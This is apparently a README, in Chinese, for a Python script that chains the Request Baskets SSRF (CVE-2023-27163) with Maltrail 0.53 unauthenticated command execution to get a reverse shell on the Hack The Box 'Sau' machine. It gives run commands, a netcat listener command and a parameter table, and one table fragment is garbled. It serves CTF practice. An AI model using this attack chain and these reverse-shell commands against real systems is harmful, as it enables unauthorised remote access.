一个 Python 漏洞利用脚本,将 CVE-2023-27163(Request Baskets ≤ 1.2.1 中的服务端请求伪造)与 Maltrail 0.53 中的未经身份验证的远程代码执行漏洞串联起来,传递反向 shell。专为 Hack The Box 的 Sau 计算机设计。
该脚本自动化了在目标上获取初始访问权限所需的利用路径,步骤如下:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
示例:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
在运行漏洞利用之前,请在你的机器上启动一个监听器以捕获反向 shell:
nc -lvnp <LISTENER_PORT>
示例:
nc -lvnp 4444
| 参数 | 描述 |
|---|---|
TARGET_URL | 目标的基本 URL(例如 http://IP) |
LISTENER_IP | 你的攻击机 IP |
LISTENER_PORT | 接收反向 shell 的端口 |
bucket_url)/(脚本会自动处理)本项目仅用于 教育目的 以及在 授权环境(如 Hack The Box)中使用。未经适当许可,不得用于任何系统。